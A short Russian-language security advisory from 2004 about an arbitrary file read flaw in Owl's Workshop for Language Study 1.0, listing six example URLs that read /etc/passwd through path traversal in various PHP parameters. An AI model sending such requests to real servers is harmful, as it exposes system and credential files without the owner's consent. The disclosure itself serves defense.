Security Lab

Просмотр произвольных файлов в Owl's Workshop for Language Study (OWLS)

Дата публикации:20.02.2004
Всего просмотров:976
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Owls Workshop 1.x
Уязвимые версии: Owl's Workshop for Language Study (OWLS) 1.0

Описание: Уязвимость обнаружена в Owl's Workshop for Language Study (OWLS). Удаленный пользователь может просматривать произвольные файлы на целевой системе.

Пример/Эксплоит:

http://[target]/owls/glossaries/index.php?file=/etc/passwd

http://[target]/ow ls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print

http://[target]/owls/readings/index.php?filename=/etc/passwd

htt p://[target]/owls/multiplechoice/resultsignore.php?filename=/etc/passwd

http://[target]/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../. ./etc/passwd

http://[target]/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd

URL производителя: http://www.foolsworkshop.com/owls/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files